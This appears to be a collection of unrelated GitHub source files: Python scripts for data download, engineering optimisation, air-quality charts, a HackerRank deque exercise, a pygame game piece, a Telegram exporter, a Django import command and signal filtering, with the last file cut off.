+{"seq_id":"17148616359","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 10 17:18:15 2020\n\n@author: aidan\n\"\"\"\nimport girder_client\n\nDestination = '/Volumes/Seagate Backup 3/'\nFolder = '553e6db18d777f082b5918eb'\ngc = girder_client.GirderClient(apiUrl='https://data.kitware.com/api/v1')\ngc.authenticate(username='anonymous', 
interactive=True)\n#gc.inheritAccessControlRecursive(UNC_ScanURL)\n\n#gc.downloadFile(fileId=FileID, path=Destination)\n\n#\n#\n#URL = 'anonymous@data.kitware.com:collection/UNC-Wisconsin\\ Neurodevelopment\\ Rhesus\\ Data/scan_data'","repo_name":"Phenomenal-Cat/MF3D-Tools","sub_path":"MF3D_Blender/MF3D_DownloadUNCdata.py","file_name":"MF3D_DownloadUNCdata.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"26087567208","text":"from pathlib import Path\nimport os\nimport hotstarship\nfrom scipy.optimize import Bounds, NonlinearConstraint, minimize\nimport numpy as np\nimport math\nimport sympy as sp\nfrom sympy import hessian\n\n# Variables\n# 0: t_f: top face sheet thickness [m]\n# 1: t_c: core thickness [m]\n# 2: t_b: bottom face sheet thickness [m]\n# 3: t_w: web thickness [m]\n# 4: Theta: corrugation angle [10^4 °] (for scaling reasons)\n# 5: p: half cell length [m]\nx0 = [2e-3, 50e-3, 2e-3, 2e-3, 0.0045, 50e-3]\n\n# Function tolerance at which to terminate\ntolerance = 1e-6\n\n# Lower and upper bounds\nlb = [0.5e-3, 2e-3, 0.5e-3, 0.5e-3, 10e-4, 3e-3]\nub = [20e-3, 100e-3, 20e-3, 20e-3, 60e-4, 100e-3]\n\n# Constraints\n# 0: back face temperature\n# 1: maximum temperature\nmax_back_T = 373.15\nmax_T = 1000\n\n# Material densities\nrho_sheet = 4420 # for Ti-6Al-4V\nrho_core = 200 # for Pyrogel XTE\n\n\nclass Functions:\n def __init__(self):\n vars = sp.var('t_f t_c t_b t_w Theta p')\n mass = rho_sheet * t_f + \\\n (rho_sheet * t_w + rho_core * (p * sp.sin(sp.rad(Theta * 1e4)) - t_w)) / \\\n (p * sp.sin(sp.rad(Theta * 1e4))) * t_c + \\\n rho_sheet * t_b\n\n # Function\n f = sp.Matrix([mass])\n X = sp.Matrix([t_f, t_c, t_b, t_w, Theta, p])\n self.f_lam = sp.lambdify(vars, f, 'numpy')\n\n # Jacobian\n J = f.jacobian(X)\n self.J_lam = sp.lambdify(vars, J, 'numpy')\n\n # Hessian\n H = hessian(f, vars)\n self.H_lam = sp.lambdify(vars, H, 'numpy')\n\n def J(self, args):\n print(\"Running Jacobian fun with: \" + str(args))\n return self.J_lam(*args)\n\n def H(self, args):\n print(\"Running Hessian fun with: \" + str(args))\n return self.H_lam(*args)\n\n def f(self, args):\n print(\"Running target fun with: \" + str(args))\n mass = self.f_lam(*args)[0][0]\n print(\"Mass is %.2f kg/m^2.\" % mass)\n return mass\n\n\ndef constraint_fun(x):\n print(\"Running constr fun with: \" + str(x))\n\n # Generate input file\n script_dir = os.path.dirname(os.path.realpath(__file__))\n xmldata = Path(script_dir, \"input_Template.xml\").read_text()\n xmldata = xmldata.replace(\"**t_f**\", str(x[0]))\n xmldata = xmldata.replace(\"**firstcell_f**\", str(x[0] / 100))\n xmldata = xmldata.replace(\"**t_c**\", str(x[1]))\n xmldata = xmldata.replace(\"**t_b**\", str(x[2]))\n xmldata = xmldata.replace(\"**t_w**\", str(x[3]))\n xmldata = xmldata.replace(\"**Theta**\", str(x[4] * 1e4))\n xmldata = xmldata.replace(\"**p**\", str(x[5]))\n\n # Save input file\n input_file = Path(script_dir, \"input.xml\")\n with open(input_file, 'w') as xmlfile:\n xmlfile.write(xmldata)\n\n # Generate input arguments\n output_file = str(Path(script_dir, \"output.csv\"))\n args = {\"input_file\": input_file,\n \"output_file\": output_file,\n \"force_write\": True}\n\n # Run Hot-STARSHIP\n valid = hotstarship.hotstarship(args)\n\n # Evaluate constraints\n sr = hotstarship.output.SolutionReader(output_file)\n cons = [max_back_T - sr.get_max_back_T(),\n max_T - sr.get_max_T()]\n\n print(\"Back face temperature constraint: %.2f K difference\" % 
-cons[0])\n print(\"Max temperature constraint: %.2f K difference\" % -cons[1])\n\n return cons\n\n\nif __name__ == \"__main__\":\n\n # Set up target function, Jacobian and Hessian\n funs = Functions()\n\n # Set bounds for thickness\n bounds = Bounds(lb=lb, ub=ub, keep_feasible=True)\n\n # Set constraints for temperature and remaining thickness\n ineq_cons = {'type': 'ineq', 'fun': constraint_fun}\n\n # Start optimization procedure\n res = minimize(funs.f, x0, jac=funs.J, hess=funs.H, method='SLSQP', constraints=[ineq_cons],\n options={'ftol': tolerance, 'eps': tolerance}, bounds=bounds)\n\n # Print result\n print(res)\n","repo_name":"nilsh7/Hot-STARSHIP","sub_path":"Input/Ti_Optimization_Side/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19963171496","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib\n# 导入csv文件\nfp = pd.read_csv(r'F:\\pythonProject\\空气质量.csv', encoding='gbk')\n# 将北京天津的数据区分开\nfp1 = fp[fp['城市'] == '天津']\nfp2 = fp[fp['城市'] == '北京']\nprint(fp1.info(), fp2.info())\n# 运行结果如下\n'''\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 90 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 NO2 98 non-null int64 \n 6 CO 98 non-null float64\n 7 SO2 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(2), int64(5), object(2)\nmemory usage: 7.0+ KB\n\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 95 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 SO2 98 non-null float64\n 6 NO2 98 non-null float64\n 7 CO 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(3), int64(4), object(2)\nmemory usage: 7.0+ KB\nNone None'''\n# 由此可以看出在质量等级这一列有部分缺失值\n# 查询得到可以通过AQI得到质量等级\n'''0 - 50一级(优);51 -100二级(良);101-150三级(轻度污染);151-200四级(中度污染);201-300五级(重度污染);300+六级(严重污染)'''\n\n\ndef value_change(column1, column2, file):\n file = file.copy()\n # 定义一个数据处理函数,通过column1的值的判断来改变column2的值\n a = 0\n lst = list(file[column1].index)\n # 获取column1 的索引\n for i in file[column1]:\n if (i > 0) and (i <= 50):\n file.loc[lst[a], column2] = '优'\n elif (i >= 51) and (i <= 100):\n file.loc[lst[a], column2] = '良'\n elif (i >= 101) and (i <= 150):\n file.loc[lst[a], column2] = '轻度污染'\n elif (i >= 151) and (i < 200):\n file.loc[lst[a], column2] = '中度污染'\n elif (i >= 201) and (i <= 300):\n file.loc[lst[a], column2] = '重度污染'\n else:\n file.loc[lst[a], column2] = np.nan\n a += 1\n return file\n\n\nfp1 = value_change('AQI', '质量等级', file=fp1)\nfp2 = value_change('AQI', '质量等级', file=fp2)\nprint(fp1.info(), fp2.info())\n'''\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- ------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 98 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 NO2 98 non-null int64 \n 6 CO 98 non-null float64\n 7 SO2 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(2), int64(5), object(2)\nmemory usage: 7.0+ KB\n\nRangeIndex: 98 entries, 0 to 97\nData columns (total 9 columns):\n # Column Non-Null Count D type \n--- 
------ -------------- ----- \n 0 日期 98 non-null object \n 1 AQI 98 non-null int64 \n 2 质量等级 98 non-null object \n 3 PM2.5 98 non-null int64 \n 4 PM10 98 non-null int64 \n 5 SO2 98 non-null float64\n 6 NO2 98 non-null float64\n 7 CO 98 non-null float64\n 8 O3_8h 98 non-null int64 \ndtypes: float64(3), int64(4), object(2)\nmemory usage: 7.0+ KB\nNone None'''\n# 对质量等级分组\nfp1_group = fp1.groupby(by='质量等级')\nfp2_group = fp1.groupby(by='质量等级')\n# 利用len函数得到九月到十二月七日中各个质量等级对应的天数\nfp1_group_quality = fp1_group.agg(len)\nfp2_group_quality = fp1_group.agg(len)\n# 去除其他列仅保留一列方便自己查看\nfp1_group_quality.drop(fp1_group_quality.iloc[:, 1::], axis=1, inplace=True)\nfp1_group_quality_1 = fp1_group_quality.rename(columns={'日期': '天数'})\nprint(fp1_group_quality_1)\n''' 天数\n质量等级 \n中度污染 3\n优 23\n良 55\n轻度污染 15\n重度污染 1'''\nfp2_group_quality.drop(fp2_group_quality.iloc[:, 1::], axis=1, inplace=True)\nfp2_group_quality_1 = fp2_group_quality.rename(columns={'日期': '天数'})\nprint(fp2_group_quality_1)\n''' 天数\n质量等级 \n中度污染 3\n优 24\n良 55\n轻度污染 15\n重度污染 1\n'''\n\n\ndef lst_va_change(lst):\n first_lst = []\n for i in lst:\n i = i.replace('(', '')\n i = i.replace(')', '')\n i = i.replace(',', '')\n i = i.replace('\\'', '')\n first_lst.append(i)\n return first_lst\n\n\n# 去除字符串的(,'以求美观\n\n\ndef pie_draw(y, name, file):\n # 设置一个画饼图的函数\n lst = [str(i) for i in file.index]\n label = lst_va_change(lst)\n # 绘图\n plt.pie(x=file[y], labels=label, autopct='%.2f', textprops={'fontsize': '10', 'color': 'k'})\n # 添加标题\n plt.title(name)\n\n\ndef two_pie_draw(y, name1, name2, name3, file1, file2):\n # 设置中文字体\n font = {'family': 'MicroSoft YaHei',\n 'size': '12'}\n matplotlib.rc('font', **font)\n plt.figure(figsize=(20, 8), dpi=80)\n plt.subplot(1, 2, 1)\n pie_draw(y, name1, file1)\n plt.subplot(1, 2, 2)\n pie_draw(y, name2, file2)\n # 保存图片\n plt.savefig(r'C:\\Users\\HP\\Desktop\\{}.png'.format(name3))\n plt.show()\n\n\ntwo_pie_draw('天数', r'天津9/1-12/7空气质量', r'北京9/1-12/7空气质量', '北京天津两市空气质量对比(总)', fp1_group_quality_1,\n fp2_group_quality_1)\n# 为了不改变fp1,fp2将其进行新的赋值\nnew_fp1 = fp1.copy()\nnew_fp2 = fp2.copy()\n# 对new_fp1,new_fp2的日期进行处理方便分组\nnew_fp1['日期'] = new_fp1['日期'].apply(lambda x: x.split('/')[1] + '月')\nnew_fp2['日期'] = new_fp2['日期'].apply(lambda x: x.split('/')[1] + '月')\n# 对日期进行分组\nnew_fp1_group = new_fp1.groupby(by='日期')\nnew_fp2_group = new_fp2.groupby(by='日期')\n# 对数据求平均值\nnew_fp1_group_mean = new_fp1_group.agg('mean')\nnew_fp2_group_mean = new_fp2_group.agg('mean')\n# 利用已设置的函数将AQI变成质量等级\nnew_fp1_group_mean = value_change(column1='AQI', column2='AQI', file=new_fp1_group_mean)\nnew_fp1_group_mean.loc[:, 'sort'] = [2, 3, 4, 1]\nnew_fp1_group_mean = new_fp1_group_mean.sort_values(by='sort')\nprint(new_fp1_group_mean)\n''' AQI PM2.5 PM10 NO2 CO SO2 O3_8h sort\n日期 \n9月 良 55.366667 55.933333 63.600000 46.200000 1.023333 58.733333 1\n10月 良 66.166667 71.666667 66.733333 54.800000 1.000000 55.366667 2\n11月 良 47.366667 87.200000 47.900000 0.910000 9.500000 43.600000 3\n12月 良 63.571429 75.571429 86.571429 64.714286 1.142857 62.000000 4\n'''\nnew_fp2_group_mean = value_change(column1='AQI', column2='AQI', file=new_fp2_group_mean)\nnew_fp2_group_mean.loc[:, 'sort'] = [2, 3, 4, 1]\nnew_fp2_group_mean = new_fp2_group_mean.sort_values(by='sort')\nprint(new_fp2_group_mean)\n''' AQI PM2.5 PM10 SO2 NO2 CO O3_8h sort\n日期 \n9月 良 18.233333 36.200000 2.533333 20.566667 0.630000 98.533333 1\n10月 优 62.774194 66.387097 54.774194 1.000000 56.612903 60.032258 2\n11月 良 44.100000 64.733333 0.643333 2.700000 35.533333 41.700000 3\n12月 优 49.428571 49.285714 74.714286 
 60.142857  1.385714  48.857143     4\n'''\n# 在此处绘制直方图将天津市PM2.5,PM10,NO2,CO,SO2,O3月平均含量表示出来\n# 设置中文字体\nfont = {'family': 'MicroSoft YaHei',\n        'size': '12'}\nmatplotlib.rc('font', **font)\n# 设置x的刻度\n_x = ['9月', '', '10月', '', '11月', '', '12月']\n# 设置y\ny_pm25 = new_fp1_group_mean['PM2.5']\ny_pm10 = new_fp1_group_mean['PM10']\ny_no2 = new_fp1_group_mean['NO2']\ny_co = new_fp1_group_mean['CO']\ny_so2 = new_fp1_group_mean['SO2']\ny_o3 = new_fp1_group_mean['O3_8h']\n\ny2_pm25 = new_fp2_group_mean['PM2.5']\ny2_pm10 = new_fp2_group_mean['PM10']\ny2_no2 = new_fp2_group_mean['NO2']\ny2_co = new_fp2_group_mean['CO']\ny2_so2 = new_fp2_group_mean['SO2']\ny2_o3 = new_fp2_group_mean['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(20, 8), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.bar(range(3, 34, 10), y_co, label='天津', color='g', alpha=0.5)\nplt.bar(range(4, 35, 10), y_so2, color='g', alpha=0.5)\nplt.bar(range(5, 36, 10), y_o3, color='g', alpha=0.5)\nplt.bar(range(6, 37, 10), y_no2, color='g', alpha=0.5)\nplt.bar(range(7, 38, 10), y_pm10, color='g', alpha=0.5)\nplt.bar(range(8, 39, 10), y_pm25, color='g', alpha=0.5)\n\nplt.bar(range(3, 34, 10), y2_co, label='北京', color='y', alpha=0.5)\nplt.bar(range(4, 35, 10), y2_so2, color='y', alpha=0.5)\nplt.bar(range(5, 36, 10), y2_o3, color='y', alpha=0.5)\nplt.bar(range(6, 37, 10), y2_no2, color='y', alpha=0.5)\nplt.bar(range(7, 38, 10), y2_pm10, color='y', alpha=0.5)\nplt.bar(range(8, 39, 10), y2_pm25, color='y', alpha=0.5)\n# 设置xy轴刻度\nplt.xticks(range(5, 36, 5), _x)\nplt.yticks(range(0, 102, 3))\n# 添加描述信息\nplt.xlabel('月份(从左到右依次为CO,SO2,O3,NO2,PM10,PM2.5)')\nplt.ylabel('浓度μg/m3(CO为mg/m3)')\nplt.title('北京天津PM2.5,PM10,NO2,CO,SO2,O3月平均含量')\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\北京天津PM2.5,PM10,NO2,CO,SO2,O3月平均含量.png')\nplt.show()\n\n# 对日期和质量等级分组\nano_new_fp1_group = new_fp1.groupby(by=['日期', '质量等级'])\nano_new_fp1_group = ano_new_fp1_group.agg(len)\nano_new_fp2_group = new_fp2.groupby(by=['日期', '质量等级'])\nano_new_fp2_group = ano_new_fp2_group.agg(len)\n# 对数据进行简单处理让其直观\nano_new_fp1_group.drop(ano_new_fp1_group.iloc[:, 1::], axis=1, inplace=True)\nano_new_fp1_group = ano_new_fp1_group.rename(columns={'AQI': '天数'})\nprint(ano_new_fp1_group)\n''' 天数\n日期   质量等级      \n10月  中度污染     2\n     优        8\n     良        18\n     轻度污染     1\n     重度污染     1\n11月  中度污染     1\n     优        7\n     良        15\n     轻度污染     7\n12月  良        6\n     轻度污染     1\n9月   优        8\n     良        16\n     轻度污染     6'''\n\nano_new_fp2_group.drop(ano_new_fp2_group.iloc[:, 1::], axis=1, inplace=True)\nano_new_fp2_group = ano_new_fp2_group.rename(columns={'AQI': '天数'})\nprint(ano_new_fp2_group)\n''' 天数\n日期   质量等级      \n10月  中度污染     1\n     优        19\n     良        10\n     轻度污染     1\n11月  中度污染     2\n     优        9\n     良        14\n     轻度污染     5\n12月  优        5\n     良        2\n9月   优        17\n     良        10\n     轻度污染     3\n'''\ntwo_pie_draw('天数', r'天津9,10,11,12月空气质量', r'北京9,10,11,12月空气质量', '北京天津两市空气质量对比(分)', ano_new_fp1_group,\n             ano_new_fp2_group)\n# 对天津市9,10,11,12月的数据进行分析得出以上结论\n\n# 开始绘图,初步分析数据,绘制折线图较为直观。\n# 定义一个函数绘制该折线图\n\n\ndef draw_api(x, y, name, file1, file2):\n    # 设置中文字体\n    font = {'family': 'MicroSoft YaHei',\n            'size': '12'}\n    matplotlib.rc('font', **font)\n    # 设置图片大小\n    plt.figure(figsize=(27, 20), dpi=80)\n    x_zhou = range(2, 2*len(fp1[x]) + 2, 2)\n    y1_zhou = file1[y]\n    y2_zhou = file2[y]\n    plt.plot(x_zhou, y1_zhou, label='天津')\n    plt.plot(x_zhou, y2_zhou, label='北京')\n    # 设置x,y轴刻度\n    x_ticks = file1[x].agg(lambda a: a.replace('2021/', ''))\n    plt.xticks(x_zhou, x_ticks, rotation=60)\n    lst = [min(y1_zhou), max(y1_zhou), min(y2_zhou), max(y2_zhou)]\n    y_ticks = range(min(lst), max(lst) + 1, 4)\n    plt.yticks(y_ticks)\n    # 添加描述信息\n    plt.xlabel(x)\n    
plt.ylabel(y)\n plt.title(name)\n # 添加网格\n plt.grid(visible=True)\n # 设置图例\n plt.legend(loc='upper left')\n plt.savefig(r'C:\\Users\\HP\\Desktop\\{}.png'.format(name))\n plt.show()\n\n\ndraw_api('日期', 'AQI', 'AQI折线图', file1=fp1, file2=fp2)\n\n# 绘制天津市9/1-12/7日每天的各个物质的浓度\n# 设置x的刻度\nfp1_x_ = fp1['日期'].agg(lambda a: a.replace('2021/', ''))\nfp1_y_pm25 = fp1['PM2.5']\nfp1_y_pm10 = fp1['PM10']\nfp1_y_no2 = fp1['NO2']\nfp1_y_co = fp1['CO']\nfp1_y_so2 = fp1['SO2']\nfp1_y_o3 = fp1['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(27, 20), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.plot(fp1_x_, fp1_y_co, label='CO')\nplt.plot(fp1_x_, fp1_y_so2, label='SO2')\nplt.plot(fp1_x_, fp1_y_o3, label='O3')\nplt.plot(fp1_x_, fp1_y_no2, label='NO2')\nplt.plot(fp1_x_, fp1_y_pm10, label='PM10')\nplt.plot(fp1_x_, fp1_y_pm25, label='PM25')\n# 设置XY轴\nplt.xticks(rotation=60)\nplt.yticks(range(0, 200, 4))\n# 添加描述信息\nplt.xlabel('日期', fontsize=12)\nplt.ylabel('浓度μg/m3(CO为mg/m3)', fontsize=12)\nplt.title('天津市每日PM2.5,PM10,NO2,CO,SO2,O3含量', fontsize=12)\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\天津PM2.5,PM10,NO2,CO,SO2,O3日含量.png')\nplt.show()\n\n\n# 绘制北京市9/1-12/7日每天的各个物质的浓度\n# 设置x的刻度\nfp2_x_ = fp2['日期'].agg(lambda a: a.replace('2021/', ''))\nfp2_y_pm25 = fp2['PM2.5']\nfp2_y_pm10 = fp2['PM10']\nfp2_y_no2 = fp2['NO2']\nfp2_y_co = fp2['CO']\nfp2_y_so2 = fp2['SO2']\nfp2_y_o3 = fp2['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(27, 20), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.plot(fp2_x_, fp2_y_co, label='CO')\nplt.plot(fp2_x_, fp2_y_so2, label='SO2')\nplt.plot(fp2_x_, fp2_y_o3, label='O3')\nplt.plot(fp2_x_, fp2_y_no2, label='NO2')\nplt.plot(fp2_x_, fp2_y_pm10, label='PM10')\nplt.plot(fp2_x_, fp2_y_pm25, label='PM25')\n# 设置XY轴\nplt.xticks(rotation=60)\nplt.yticks(range(0, 200, 4))\n# 添加描述信息\nplt.xlabel('日期', fontsize=12)\nplt.ylabel('浓度μg/m3(CO为mg/m3)', fontsize=12)\nplt.title('北京市每日PM2.5,PM10,NO2,CO,SO2,O3含量', fontsize=12)\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\北京PM2.5,PM10,NO2,CO,SO2,O3日含量.png')\nplt.show()\n\n'''\n反思:\n1.数据问题\n找到的数据与所学营销专业并无太大关联,仅仅是凭自己的兴趣找的这组数,这组数据相对简单,数据内容少,数据处理过程相对简单,难度较低。\n2.写代码时遇到的问题\n在导入文件时出现了部分未见过的问题:\n(1.文件编码问题UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd0 in position 0: invalid continuation byte\n(2.csv文件打开错误_csv.Error: line contains NULL byte\n解决办法\n(1.utf-8没办法成功换用gbk\n(2.csv文件打开错误是由于保存时扩展名为xls或xlsx,而将其改为csv文件,因此将文件另存为\ncsv文件即可。\n在绘图时,\n汉字无法在图中显示出来,使用matplotlib.rc函数声明字体\n折线图:因为xy轴刻度太过密集无法看清,改变y轴刻度步长,将x轴刻度删除不必要的内容并进行\n旋转\n饼状图:由于部分内容占比太少导致文字重合,暂未找到好的方法解决\n'''","repo_name":"crushwhite/DataAnalysis","sub_path":"case 2 simple analysis.py","file_name":"case 2 simple analysis.py","file_ext":"py","file_size_in_byte":15861,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18187507959","text":"# input:\n# The first line contains an integer N, the number of operations.\n# The next N lines contains the space separated names of methods and their values.\n\"\"\"\n6\nappend 1\nappend 2\nappend 3\nappendleft 4\npop\npopleft\n\"\"\"\n# output: 1 2\n\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT\nfrom collections import deque\nd = deque()\n\nN = int(input())\nfor i in range(N):\n cmd = input().split()\n if len(cmd) == 1:\n eval( \"\".join([\"d.\",cmd[0],\"()\"]) )\n else:\n eval( \"\".join([\"d.\",cmd[0],\"(\",cmd[1],\")\"]) )\n\nprint(*d)\n","repo_name":"DuverneyCM/hackerrank","sub_path":"python/collections/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33327188330","text":"from database.bd_connexion import *\nfrom controllers.__init__ import *\nimport random\n\nclass model_client:\n\n @classmethod\n def register(self, id_perfil = None):\n done = None\n try:\n db_register(f\"\"\"\n INSERT INTO cliente (id_perfil,fotos_compradas) \n VALUES({id_perfil},0);\n \"\"\")\n done = True\n except:\n done = False\n return done\n \n ","repo_name":"LuisFlores2170/evento_fotografico","sub_path":"models/model_client.py","file_name":"model_client.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40388874116","text":"#!/usr/bin/env python\r\nimport pygame\r\nimport sprite\r\n\r\nclass Chip(object):\r\n #--make sure you keep all the init variables(ID, owner, colour, is_falling), class variables, print_chips(), and the return values for gravity(). They'll be needed for the main loop-- \r\n all_chips = {}\r\n def __init__(self, ID, owner, colour, x, y, width, height, vel, image=None, is_falling=False):\r\n self.ID = ID\r\n self.owner = owner\r\n self.colour = colour\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.vel = vel\r\n self.image = image\r\n self.is_falling = is_falling\r\n Chip.all_chips[self.ID] = self\r\n\r\n def move(self, mouse_pos):\r\n #--checking and adjusting chip's position--\r\n if mouse_pos < 80:\r\n self.x = 0\r\n if mouse_pos > 80 and mouse_pos < 160:\r\n self.x = 80\r\n if mouse_pos > 160 and mouse_pos < 240:\r\n self.x = 160\r\n if mouse_pos > 240 and mouse_pos < 320:\r\n self.x = 240\r\n if mouse_pos > 320 and mouse_pos < 400:\r\n self.x = 320\r\n if mouse_pos > 400 and mouse_pos < 480:\r\n self.x = 400\r\n if mouse_pos > 480 :\r\n self.x = 480\r\n\r\n def gravity(self, other):\r\n #gravity changes chips y then return wether it's y has hit the limit\r\n if other.collision(self.x, self.y) != True and self.is_falling == True:\r\n self.y += self.vel\r\n self.vel += 1\r\n return 0\r\n else:\r\n self.is_falling = False\r\n self.y = other.y - self.height\r\n return 1\r\n\r\n @classmethod\r\n def draw_chips(cls, screen):\r\n for chip in cls.all_chips.values():\r\n if chip.image == None:\r\n pygame.draw.circle(screen, chip.colour, (chip.x + 40, chip.y), chip.width)\r\n else:\r\n image = pygame.transform.scale(chip.image, (chip.width, chip.height))\r\n screen.blit(image, (chip.x, chip.y))","repo_name":"AlanHianWu/Half-Oreo","sub_path":"Chip.py","file_name":"Chip.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34243160169","text":"\"\"\"Exporter Engine.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom configparser import ConfigParser\nfrom typing import Dict, List\n\nfrom TEx.exporter.exporter_base import BaseExporter\nfrom TEx.exporter.pandas_rolling_exporter import PandasRollingExporter\nfrom TEx.models.facade.finder_notification_facade_entity import 
FinderNotificationMessageEntity\n\nlogger = logging.getLogger('TelegramExplorer')\n\n\nclass ExporterEngine:\n \"\"\"Primary Export Engine.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize Exporter Engine.\"\"\"\n self.exporters: Dict = {}\n\n def __load_exporters(self, config: ConfigParser) -> None:\n \"\"\"Load all Registered Exporters.\"\"\"\n registered_exporters: List[str] = [item for item in config.sections() if 'EXPORTER.' in item]\n\n for register in registered_exporters:\n if 'ROLLING_PANDAS' in register:\n\n exporter: PandasRollingExporter = PandasRollingExporter()\n exporter.configure(config=config[register], source=config['CONFIGURATION']['phone_number'])\n\n self.exporters.update({\n register: {'instance': exporter},\n })\n\n def configure(self, config: ConfigParser) -> None:\n \"\"\"Configure Finder.\"\"\"\n self.__load_exporters(config)\n\n async def run(self, exporters: List[str], entity: FinderNotificationMessageEntity, rule_id: str) -> None:\n \"\"\"Dispatch all Exporting Processes.\"\"\"\n if len(exporters) == 0:\n return\n\n for dispatcher_name in exporters:\n\n target_exporter: BaseExporter = self.exporters[dispatcher_name]['instance']\n\n try:\n await target_exporter.run(entity=entity, rule_id=rule_id)\n\n except Exception as _ex: # Yes, Catch All\n logging.exception('Unable to Export Data')\n\n async def shutdown(self) -> None:\n \"\"\"Shutdown all Exporters and Flush all to Disk.\"\"\"\n for dispatcher_name in self.exporters:\n\n target_exporter: BaseExporter = self.exporters[dispatcher_name]['instance']\n\n try:\n target_exporter.shutdown()\n\n except Exception as _ex: # Yes, Catch All\n logging.exception(f'Unable to Shutdown the \"{dispatcher_name}\" Exporter Gracefully. Data may be lost.')\n","repo_name":"guibacellar/TEx","sub_path":"TEx/exporter/exporter_engine.py","file_name":"exporter_engine.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"40"} +{"seq_id":"25888246195","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom web.models import *\nfrom django.contrib.auth.models import User\nimport codecs\n\nclass Command(BaseCommand):\n help = 'Fill the database with question for tests. 
The document to import must be named: questions.txt'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--import',\n action='store_true',\n dest='import',\n help='Crea info real.',\n )\n parser.add_argument(\n '--beta',\n action='store_true',\n dest='beta',\n help='Crea info para modo dummy.',\n )\n def handle(self, *args, **options):\n\n if (options['beta']):\n return 0\n\n if (options['import']):\n #Importamos un archivo de preguntas, llamado questions.csv\n print(\"Importando preguntas...\")\n preguntas = open('questions.csv', encoding='utf-8')\n if not preguntas:\n print(\"Error: archivo questions.csv no encontrado\")\n return -1\n for pregunta in preguntas:\n pregunta = pregunta.strip().split(';')\n #print(pregunta[0])\n q = QuestionModel()\n q.statement = pregunta[1]\n q.optionA = pregunta[2]\n q.optionB = pregunta[3]\n q.optionC = pregunta[4]\n q.optionD = pregunta[5]\n q.correct = pregunta[6]\n experiencia = ExperienceModel.objects.filter(name=pregunta[0])\n #print(experiencia[0].pk)\n q.experience = experiencia[0]\n q.save()\n","repo_name":"roloow/umvral","sub_path":"web-service/webumvral/web/management/commands/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1343677441","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sgn\nimport scipy.interpolate as spint\n\nfrom shutil import copyfile\n\nSET_DPI = 100\nFIGSIZE = (18, 10)\n\n\ndef decimate_data(filename, newfreq=40):\n data = np.genfromtxt(filename + '.tsv.gz')\n f = spint.interp1d(data[:, 0], data[:, ], axis=0, fill_value='extrapolate')\n data_tdec = np.arange(data[0, 0], data[-1, 0], 1/newfreq)\n data_dec = f(data_tdec)\n del data\n np.savetxt(filename + '_dec.tsv.gz', data_dec)\n return data_dec\n\n\ndef filter_signal(data_dec, bw_ppg=[0.5/20, 8/20], bw=2/20):\n ba = sgn.butter(7, bw, 'lowpass')\n ba_ppg = sgn.butter(7, bw_ppg, 'bandpass')\n data_filt = np.empty(data_dec.shape)\n data_filt[:, 0] = 